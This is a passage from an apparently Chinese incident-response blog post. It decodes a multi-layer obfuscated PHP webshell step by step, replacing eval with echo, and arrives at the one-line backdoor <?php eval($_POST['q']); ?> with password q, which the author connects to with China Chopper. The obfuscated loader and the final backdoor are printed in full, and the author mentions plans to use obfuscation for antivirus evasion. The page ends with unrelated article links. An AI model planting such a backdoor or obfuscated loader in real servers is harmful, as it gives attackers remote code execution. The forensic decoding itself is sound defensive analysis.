1AbV0R1VXExR3gQV2zxq3R9MWFYBqH/MZ==";
eval('?>'.base64_decode($strtr(substr($AMqYfN,52*2),substr($AMqYfN,52,52),substr($AMqYfN,0,52))));
?>

现在这里就剩下一个变量——$xGCfol了,我们可以尝试直接echo一下,注意这里我们需要使用一个htmlspecialchars进行一次实体编码处理,不然直接访问就执行了

<?php 
$AMqYfN="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";
echo htmlspecialchars(('?>'.base64_decode(strtr(substr($AMqYfN,52*2),substr($AMqYfN,52,52),substr($AMqYfN,0,52)))));
?>

随后得到如下结果:

?><?php define('BkzWLZ0717',HLPHNk0717);$tcKeYa=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZFlrdEJ6bkNnaXF1WlhLSWJtdk1qVkRUb1NMRlFleU9QcFJock5XeGZ3QUdFVWFKSGNzbA==");$piaGCV=$tcKeYa[3].$tcKeYa[6].$tcKeYa[33].$tcKeYa[30];$pZYgqf=$tcKeYa[33].$tcKeYa[10].$tcKeYa[24].$tcKeYa[10].$tcKeYa[24];$okaega=$pZYgqf[0].$tcKeYa[18].$tcKeYa[3].$pZYgqf[0].$pZYgqf[1].$tcKeYa[24];$wIzynf=$tcKeYa[7].$tcKeYa[13];$piaGCV.=$tcKeYa[22].$tcKeYa[36].$tcKeYa[29].$tcKeYa[26].$tcKeYa[30].$tcKeYa[32].$tcKeYa[35].$tcKeYa[26].$tcKeYa[30];eval($piaGCV("JHRxc2lUYz0iS0R4Y1ZFb3NiQWZ2V0hkdElTQm5QcVlHWlRRWGFDTXVPbWx6cHlraWhMZ2pOckZ3VUplUmhQaVp4UWRsRU9VSW51a0RnWU1YTlJjanZwcUJKZmFTeUdIYkF6c2V3ckxLQ1dtVFZGb3ROUDlUSnVPTE5iND0iO2V2YWwoJz8+Jy4kcGlhR0NWKCRwWllncWYoJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYqMiksJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYsJHdJenluZiksJG9rYWVnYSgkdHFzaVRjLDAsJHdJenluZikpKSk7"));?><?php define('jrTtpv0717',HLPHNk0717);$fLDUZD=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZG5xWGd4S0Z0d3BEU0pQc3lsalRWSFprR2hMb2VDRXZPZmlyWWJCTkFVdWNJYVJNeldRbQ==");$ysCLHC=$fLDUZD[3].$fLDUZD[6].$fLDUZD[33].$fLDUZD[30];$ICOlFs=$fLDUZD[33].$fLDUZD[10].$fLDUZD[24].$fLDUZD[10].$fLDUZD[24];$ZMKzMl=$ICOlFs[0].$fLDUZD[18].$fLDUZD[3].$ICOlFs[0].$ICOlFs[1].$fLDUZD[24];$OHnPgK=$fLDUZD[7].$fLDUZD[13];$ysCLHC.=$fLDUZD[22].$fLDUZD[36].$fLDUZD[29].$fLDUZD[26].$fLDUZD[30].$fLDUZD[32].$fLDUZD[35].$fLDUZD[26].$fLDUZD[30];eval($ysCLHC("JHh0S1lRYT0ib1lwTlR4WEJSQUVGUGZNVlFiWmpxbmV3SGlXdkpDeXRoZ2RMT0dyYXpJRGt1bFNVc2NtS1VqaWxmWk5xTHlBZ1NNZUd1UURWd1JzQnB2Y0tUYlB0SFlkRW1JckZYYWhKa294ekNXbk9TaDlCRnB5bGJuRzJqY0JVVGc5dWYxbHpjUGRaVDEwaW1CME9TWDQ9IjtldmFsKCc/PicuJHlzQ0xIQygkSUNPbEZzKCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLKjIpLCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLLCRPSG5QZ0spLCRaTUt6TWwoJHh0S1lRYSwwLCRPSG5QZ0spKSkpOw=="));?>

格式化一下之后得到如下结果:

<?php 
define('BkzWLZ0717',HLPHNk0717);
$tcKeYa=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZFlrdEJ6bkNnaXF1WlhLSWJtdk1qVkRUb1NMRlFleU9QcFJock5XeGZ3QUdFVWFKSGNzbA==");
$piaGCV=$tcKeYa[3].$tcKeYa[6].$tcKeYa[33].$tcKeYa[30];
$pZYgqf=$tcKeYa[33].$tcKeYa[10].$tcKeYa[24].$tcKeYa[10].$tcKeYa[24];
$okaega=$pZYgqf[0].$tcKeYa[18].$tcKeYa[3].$pZYgqf[0].$pZYgqf[1].$tcKeYa[24];
$wIzynf=$tcKeYa[7].$tcKeYa[13];
$piaGCV.=$tcKeYa[22].$tcKeYa[36].$tcKeYa[29].$tcKeYa[26].$tcKeYa[30].$tcKeYa[32].$tcKeYa[35].$tcKeYa[26].$tcKeYa[30];
eval($piaGCV("JHRxc2lUYz0iS0R4Y1ZFb3NiQWZ2V0hkdElTQm5QcVlHWlRRWGFDTXVPbWx6cHlraWhMZ2pOckZ3VUplUmhQaVp4UWRsRU9VSW51a0RnWU1YTlJjanZwcUJKZmFTeUdIYkF6c2V3ckxLQ1dtVFZGb3ROUDlUSnVPTE5iND0iO2V2YWwoJz8+Jy4kcGlhR0NWKCRwWllncWYoJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYqMiksJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYsJHdJenluZiksJG9rYWVnYSgkdHFzaVRjLDAsJHdJenluZikpKSk7"));
?>
<?
php 
define('jrTtpv0717',HLPHNk0717);
$fLDUZD=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZG5xWGd4S0Z0d3BEU0pQc3lsalRWSFprR2hMb2VDRXZPZmlyWWJCTkFVdWNJYVJNeldRbQ==");
$ysCLHC=$fLDUZD[3].$fLDUZD[6].$fLDUZD[33].$fLDUZD[30];
$ICOlFs=$fLDUZD[33].$fLDUZD[10].$fLDUZD[24].$fLDUZD[10].$fLDUZD[24];
$ZMKzMl=$ICOlFs[0].$fLDUZD[18].$fLDUZD[3].$ICOlFs[0].$ICOlFs[1].$fLDUZD[24];
$OHnPgK=$fLDUZD[7].$fLDUZD[13];
$ysCLHC.=$fLDUZD[22].$fLDUZD[36].$fLDUZD[29].$fLDUZD[26].$fLDUZD[30].$fLDUZD[32].$fLDUZD[35].$fLDUZD[26].$fLDUZD[30];
eval($ysCLHC("JHh0S1lRYT0ib1lwTlR4WEJSQUVGUGZNVlFiWmpxbmV3SGlXdkpDeXRoZ2RMT0dyYXpJRGt1bFNVc2NtS1VqaWxmWk5xTHlBZ1NNZUd1UURWd1JzQnB2Y0tUYlB0SFlkRW1JckZYYWhKa294ekNXbk9TaDlCRnB5bGJuRzJqY0JVVGc5dWYxbHpjUGRaVDEwaW1CME9TWDQ9IjtldmFsKCc/PicuJHlzQ0xIQygkSUNPbEZzKCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLKjIpLCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLLCRPSG5QZ0spLCRaTUt6TWwoJHh0S1lRYSwwLCRPSG5QZ0spKSkpOw=="));
?>

咦,格式化之后发现竟然又变得复杂了,不慌,我们再次进行eval到echo的替换操作并将关键得随机变量名称进行一次输出:

<?php 
define('BkzWLZ0717',HLPHNk0717);
$tcKeYa=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZFlrdEJ6bkNnaXF1WlhLSWJtdk1qVkRUb1NMRlFleU9QcFJock5XeGZ3QUdFVWFKSGNzbA==");
$piaGCV=$tcKeYa[3].$tcKeYa[6].$tcKeYa[33].$tcKeYa[30];
$pZYgqf=$tcKeYa[33].$tcKeYa[10].$tcKeYa[24].$tcKeYa[10].$tcKeYa[24];
$okaega=$pZYgqf[0].$tcKeYa[18].$tcKeYa[3].$pZYgqf[0].$pZYgqf[1].$tcKeYa[24];
$wIzynf=$tcKeYa[7].$tcKeYa[13];
$piaGCV.=$tcKeYa[22].$tcKeYa[36].$tcKeYa[29].$tcKeYa[26].$tcKeYa[30].$tcKeYa[32].$tcKeYa[35].$tcKeYa[26].$tcKeYa[30];
echo $piaGCV.'<br>';
echo $pZYgqf.'<br>';
echo $okaega.'<br>';
echo $wIzynf.'<br>';
echo htmlentities(($piaGCV("JHRxc2lUYz0iS0R4Y1ZFb3NiQWZ2V0hkdElTQm5QcVlHWlRRWGFDTXVPbWx6cHlraWhMZ2pOckZ3VUplUmhQaVp4UWRsRU9VSW51a0RnWU1YTlJjanZwcUJKZmFTeUdIYkF6c2V3ckxLQ1dtVFZGb3ROUDlUSnVPTE5iND0iO2V2YWwoJz8+Jy4kcGlhR0NWKCRwWllncWYoJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYqMiksJG9rYWVnYSgkdHFzaVRjLCR3SXp5bmYsJHdJenluZiksJG9rYWVnYSgkdHFzaVRjLDAsJHdJenluZikpKSk7")));
?>
<?php 
define('jrTtpv0717',HLPHNk0717);
$fLDUZD=base64_decode("bjF6Yi9tYTVcdnQwaTI4LXB4dXF5KjZscmtkZzlfZWhjc3dvNCtmMzdqZG5xWGd4S0Z0d3BEU0pQc3lsalRWSFprR2hMb2VDRXZPZmlyWWJCTkFVdWNJYVJNeldRbQ==");
$ysCLHC=$fLDUZD[3].$fLDUZD[6].$fLDUZD[33].$fLDUZD[30];
$ICOlFs=$fLDUZD[33].$fLDUZD[10].$fLDUZD[24].$fLDUZD[10].$fLDUZD[24];
$ZMKzMl=$ICOlFs[0].$fLDUZD[18].$fLDUZD[3].$ICOlFs[0].$ICOlFs[1].$fLDUZD[24];
$OHnPgK=$fLDUZD[7].$fLDUZD[13];
$ysCLHC.=$fLDUZD[22].$fLDUZD[36].$fLDUZD[29].$fLDUZD[26].$fLDUZD[30].$fLDUZD[32].$fLDUZD[35].$fLDUZD[26].$fLDUZD[30];
echo $fLDUZD.'<br>';
echo $ysCLHC.'<br>';
echo $ICOlFs.'<br>';
echo $ZMKzMl.'<br>';
echo $OHnPgK.'<br>';
echo $ysCLHC.'<br>';
echo htmlentities(($ysCLHC("JHh0S1lRYT0ib1lwTlR4WEJSQUVGUGZNVlFiWmpxbmV3SGlXdkpDeXRoZ2RMT0dyYXpJRGt1bFNVc2NtS1VqaWxmWk5xTHlBZ1NNZUd1UURWd1JzQnB2Y0tUYlB0SFlkRW1JckZYYWhKa294ekNXbk9TaDlCRnB5bGJuRzJqY0JVVGc5dWYxbHpjUGRaVDEwaW1CME9TWDQ9IjtldmFsKCc/PicuJHlzQ0xIQygkSUNPbEZzKCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLKjIpLCRaTUt6TWwoJHh0S1lRYSwkT0huUGdLLCRPSG5QZ0spLCRaTUt6TWwoJHh0S1lRYSwwLCRPSG5QZ0spKSkpOw==")));
?>

执行结果如下所示:

我去,好无情,竟然还来....,由上面可得到如下对标内容:

echo $piaGCV.'<br>';        base64_decode
echo $pZYgqf.'<br>';        strtr
echo $okaega.'<br>';        substr
echo $wIzynf.'<br>';        52

echo $ysCLHC.'<br>';        base64_decode
echo $ICOlFs.'<br>';        strtr
echo $ZMKzMl.'<br>';        substr
echo $OHnPgK.'<br>';        52
echo $ysCLHC.'<br>';        base64_decode

紧接着我们再对上面的内容中的变量进行替换得到如下的结果:

<?php
$tqsiTc="KDxcVEosbAfvWHdtISBnPqYGZTQXaCMuOmlzpykihLgjNrFwUJeRhPiZxQdlEOUInukDgYMXNRcjvpqBJfaSyGHbAzsewrLKCWmTVFotNP9TJuOLNb4=";
eval('?>'.base64_decode(strtr(substr($tqsiTc,52*2),substr($tqsiTc,52,52),substr($tqsiTc,0,52))));
$xtKYQa="oYpNTxXBRAEFPfMVQbZjqnewHiWvJCythgdLOGrazIDkulSUscmKUjilfZNqLyAgSMeGuQDVwRsBpvcKTbPtHYdEmIrFXahJkoxzCWnOSh9BFpylbnG2jcBUTg9uf1lzcPdZT10imB0OSX4=";
eval('?>'.base64_decode(strtr(substr($xtKYQa,52*2),substr($xtKYQa,52,52),substr($xtKYQa,0,52))));
?>

随后我们直接将上面eval改echo并结合htmlentities进行输出:

<?php
$tqsiTc="KDxcVEosbAfvWHdtISBnPqYGZTQXaCMuOmlzpykihLgjNrFwUJeRhPiZxQdlEOUInukDgYMXNRcjvpqBJfaSyGHbAzsewrLKCWmTVFotNP9TJuOLNb4=";
echo htmlentities(('?>'.base64_decode(strtr(substr($tqsiTc,52*2),substr($tqsiTc,52,52),substr($tqsiTc,0,52)))));
$xtKYQa="oYpNTxXBRAEFPfMVQbZjqnewHiWvJCythgdLOGrazIDkulSUscmKUjilfZNqLyAgSMeGuQDVwRsBpvcKTbPtHYdEmIrFXahJkoxzCWnOSh9BFpylbnG2jcBUTg9uf1lzcPdZT10imB0OSX4=";
echo htmlentities(('?>'.base64_decode(strtr(substr($xtKYQa,52*2),substr($xtKYQa,52,52),substr($xtKYQa,0,52)))));
?>

执行结果如下所示:

最后得这个结果属实有点小离谱???一大串变一句话???

<?php eval($_POST['q']); ?>

内容证实为一句话木马,连接密码为q,随后我们使用菜刀连接源webshell,成功交差

文末小结

本篇文章的起源主要是因为客户的需求也是因为个人的好奇心驱动,其中主要介绍了对应急响应过程中编码混淆的webshell进行层层解码获取webshell连接密码的过程,之前曾写过的webshell免杀实践文章中主要的免杀思路在于借助PHP语言的特性以及函数来实现,感觉后面可以深入再分析一下关于PHP源码混淆加密处理在webshell免杀中的应用,感觉这个在大马文件中应该极为合适,先在这里挖个坑,后面来填~

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1938534.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数据结构与算法04二叉树|二叉排序树|AVL树

目录 一、二叉树(binary tree) 1、二叉树常见术语 2、二叉树常用的操作 2.1、初始化&#xff1a;与链表十分相似&#xff0c;先创建节点&#xff0c;然后构造引用/指针关系. 2.2、插入和删除操作 3、常见二叉树类型 3.1、满二叉树 3.2、完全二叉树&#xff08;complete b…

跳跃游戏Ⅱ - vector

55. 跳跃游戏 - 力扣&#xff08;LeetCode&#xff09; class Solution { public:bool canJump(vector<int>& nums) {int n nums.size();int reach 0;for(int i 0; i < n; i){if(i > reach){return false;}reach max(inums[i], reach);}return true;} }; …

SpringBoot3 + Vue3 学习 Day 2

登入接口 和 获取用户详细信息的开发 学习视频登入接口的开发1、登入主逻辑2、登入认证jwt 介绍生成 JWT① 导入依赖② 编写代码③ 验证JWT 登入认证接口的实现① 导入 工具类② controller 类实现③ 存在的问题及优化① 编写拦截器② 注册拦截器③ 其他接口直接提供服务 获取用…

JVM(day4)类加载机制

类加载过程 加载 通过一个类的全限定名来获取定义此类的二进制字节流。 将这个字节流所代表的静态存储结构转化为方法区的运行时数据结构。 在内存中生成一个代表这个类的java.lang.Class对象&#xff0c;作为方法区这个类的各种数据的访问入口。 验证 文件格式验证 元数…

LeetCode做题记录(第二天)647. 回文子串

题目&#xff1a; 647. 回文子串 标签&#xff1a;双指针 字符串 动态规划 题目信息&#xff1a; 思路一&#xff1a;暴力实现 我们直接for套for分割成一个个子串再判断&#xff0c;如果子串是回文子串&#xff0c;就1&#xff0c;最后得出结果 代码实现&#xff1a; cl…

C语言实例-约瑟夫生者死者小游戏

问题&#xff1a; 30个人在一条船上&#xff0c;超载&#xff0c;需要15人下船。于是人们排成一队&#xff0c;排队的位置即为他们的编号。报数&#xff0c;从1开始&#xff0c;数到9的人下船&#xff0c;如此循环&#xff0c;直到船上仅剩15人为止&#xff0c;问都有哪些编号…

Missing script:‘dev‘

场景&#xff1a; npm run dev 原因&#xff1a;没有安装依赖&#xff0c;可用镜像安装&#xff08;详见下图ReadMe 蓝色字体&#xff09;&#xff0c;没安装依赖可从package-lock.json文件是否存在看出&#xff0c;存在则有依赖 解决&#xff1a;

KMP算法(算法篇)

算法之KMP算法 KMP算法 概念&#xff1a; KMP算法是用于解决字符串匹配的问题的算法&#xff0c;也就是有一个文本串和一个模式串&#xff0c;求解这个模式串是否在文本串中出现或者匹配。相对于暴力求解&#xff0c;KMP算法使用了前缀表来进行匹配&#xff0c;充分利用了之…

【Vue3】从零开始编写项目

【Vue3】从零开始编写项目 背景简介开发环境开发步骤及源码总结 背景 随着年龄的增长&#xff0c;很多曾经烂熟于心的技术原理已被岁月摩擦得愈发模糊起来&#xff0c;技术出身的人总是很难放下一些执念&#xff0c;遂将这些知识整理成文&#xff0c;以纪念曾经努力学习奋斗的…

神经网络模型实现(训练、测试)

目录 一、神经网络骨架&#xff1a;二、卷积操作&#xff1a;三、卷积层&#xff1a;四、池化层&#xff1a;五、激活函数&#xff08;以ReLU为例&#xff09;&#xff1a;六、模型搭建&#xff1a;七、损失函数、梯度下降&#xff1a;八、模型保存与加载&#xff1a;九、模型训…

Linux下安装JDK、Tomact、MySQL以及Nginx的超详细步骤

目录 1、为什么安装这些软件 2、安装软件的方式 3、安装JDK 3.1 下载Linux版本的JDK 3.2 将压缩包拖拽到Linux系统下 3.3 解压jdk文件 3.4 修改文件夹名字 3.5 配置环境变量 4、安装Tomcat 4.1 下载Tomcat 4.2 将Tomcat放入Linux系统并解压&#xff0c;步骤如上面的…

MenuToolButton自绘控件,带下拉框的QToolButton,附源码

MenuToolButton自绘控件&#xff0c;带下拉框的QToolButton 效果 下拉样式可自定义 跟随QToolButton的Qt::ToolButtonStyle属性改变图标文字样式 使用示例 正常UI文件创建QToolButton然后提升&#xff0c;或者直接代码创建都可以。 // 创建一个 QList 对象来存储 QPixm…

JDK、JRE、JVM的区别java的基本数据类型

说一说JDK、JRE、JVM的区别在哪&#xff1f; JDK&#xff1a; Java Delopment kit是java工具包&#xff0c;包含了编译器javac&#xff0c;调试器&#xff08;jdb&#xff09;以及其他用于开发和调试java程序的工具。JDK是开发人员在开发java应用程序时候所需要的的基本工具。…

10道JVM经典面试题

1、 JVM中&#xff0c;new出来的对象是在哪个区&#xff1f; 2、 说说类加载有哪些步骤&#xff1f; 3、 JMM是什么&#xff1f; 4、 说说JVM内存结构&#xff1f; 5、 MinorGC和FullGC有什么区别&#xff1f; 6、 什么是STW? 7、 什么情况下会发生堆/栈溢出&#xff1f…

【高中数学/对数函数】log_x_x+1与(x+1)/x,log_x+1_x与x/(x+1)的图线有着惊人的相似性

【图像】 褐线与蓝线&#xff0c;黄线与绿线&#xff0c;只是像左右平移了一样。 【生成图像的代码】 <!DOCTYPE html> <html lang"utf-8"> <meta http-equiv"Content-Type" content"text/html; charsetutf-8"/> <head>…

大模型学习笔记十二:AI产品部署

文章目录 一、如何选择GPU和云服务器厂商&#xff0c;追求最高性价比1&#xff09;根据场景选择GPU2&#xff09;训练或微调所需显卡&#xff08;以Falcon为例子&#xff09;3&#xff09;服务器价格计算器 二、全球大模型了解1&#xff09;llm所有模型2&#xff09;模型综合排…

基于Python+Django,开发的一个在线教育系统

一、项目简介 使用Python的web框架Django进行开发的一个在线教育系统&#xff01; 二、所需要的环境与组件 Python3.6 Django1.11.7 Pymysql Mysql pure_pagination DjangoUeditor captcha xadmin crispy_forms 三、安装 1. 下载项目后进入项目目录cd Online-educ…

企业微信PC版应用跳转到默认浏览器,避坑指南,欢迎补充(Vue项目版)。。。

引子 关于企业微信PC版应用跳转到默认浏览器&#xff0c;我之前写过一篇文章&#xff1a;企业微信PC版应用跳转到默认浏览器&#xff0c;避坑指南&#xff0c;欢迎补充。。。 以前的文章里用的前后端一体的Jsp项目&#xff0c;这次我使用的是前后端分离的Vue项目&#xff0c;…

数据库——单表查询

一、建立数据库mydb8_worker mysql> use mydb8_worker; 二、建立表 1.创建表 mysql> create table t_worker(department_id int(11) not null comment 部门号,-> worder_id int(11) primary key not null comment 职工号,-> worker_date date not null comment…

Git安装教程 | Git配置教程 | Github

&#x1f64b;大家好&#xff01;我是毛毛张! &#x1f308;个人首页&#xff1a; 神马都会亿点点的毛毛张 &#x1f4cc;本片教程是分享的Git教程的第1️⃣期&#xff1a;Git的安装与配置✈️ 文章目录 1.前言&#x1f347;2.Git下载&#x1f34e;3.Git 的安装&#x1f95d…